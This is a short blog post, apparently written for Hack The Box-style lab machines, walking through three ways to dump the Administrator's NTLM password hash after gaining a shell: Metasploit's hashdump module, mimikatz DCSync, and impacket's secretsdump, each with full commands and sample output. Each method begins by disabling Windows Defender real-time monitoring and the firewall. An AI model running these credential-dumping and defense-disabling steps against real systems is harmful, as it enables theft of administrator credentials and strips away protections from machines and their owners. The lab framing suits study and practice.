How to dump the ntlm hash of user administrator
How to dump the ntlm hash of user administrator
Cancel

How to dump the ntlm hash of user administrator

Using Metasploit-Hashdump

After getting shell as administrator Do these things.

First disable the real time protection if its enabled

1
Set-MpPreference -DisableRealtimeMonitoring $true

Then disable the Anti-Virus protection

1
netsh advfirewall set  currentprofile state off
  • get a meterpreter shell on the particular Machine

Background the session with ctrl+z

1
2
meterpreter >                           
Background session 1? [y/N]  y

Load the module post/windows/gather/hashdump

1
msf5 exploit(multi/handler) > use post/windows/gather/hashdump                                   

List your background sessions

1
2
3
4
5
6
7
8
msf5 post(windows/gather/hashdump) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ MACHINE  10.10.14.X:2345 -> 10.10.10.X:49696 (10.10.10.X)

Set your session and run the module

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
msf5 post(windows/gather/hashdump) > set session 1
session => 1
msf5 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY d132fb96a18c6ee06dee89f8effb8e06...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:97fc053bc0b23588798277b22540c40d:::

[*] Post module execution completed

The hash is divided into 2 parts First one is LM and second one is NTLM

NTLM hash is 97fc053bc0b23588798277b22540c40d

Just copy paste the NTLM hash in the writeup where i asked for it

Using mimikatz

After getting shell as administrator Do these things.

First disable the real time protection if its enabled

1
Set-MpPreference -DisableRealtimeMonitoring $true

Then disable the Anti-Virus protection

1
netsh advfirewall set  currentprofile state off

Then run the mimikatz with following arguments

1
./mimikatz.exe "lsadump::dcsync /user:administrator"

You can download mimikatz from Here

You will get output like this

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
C:\tmp> ./mimikatz.exe "lsadump::dcsync /user:administrator"

  .#####.   mimikatz 2.2.0 (x86) #18362 Feb  8 2020 12:26:09
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # lsadump::dcsync /user:administrator
[DC] 'domain.LOCAL' will be the domain
[DC] 'machine.domain.LOCAL' will be the DC server
[DC] 'administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 
Password last change : 1/24/2020 9:14:15 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: f9485863c1e9e05851ab40cbb5ab9dff

And the NTLM hash we got is f9485863c1e9e05851ab40cbb5ab9dff

Just copy paste it in the writeup where i asked for it.

Using Secretdump

If you have owned a machine.And you have the user Administrator's password ,You can get the NTLM hashes of user Administrator using secrectdump.Secretdump is a tool from impacket-tools

1
2
3
4
5
6
secretsdump.py -just-dc-ntlm domain.local/Administrator:"Mypass"@10.10.10.X
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1b9e07543aa40cbb4ab9dfd:::

The hash is divided into two sections first LM hash and second one is NTLM.

Here we got the NTLM which is d9485863c1b9e07543aa40cbb4ab9dfd Just copy paste it in the writeup where i asked for it.

This post is licensed under CC BY 4.0 by the author.

© 2020 Prashant Saini.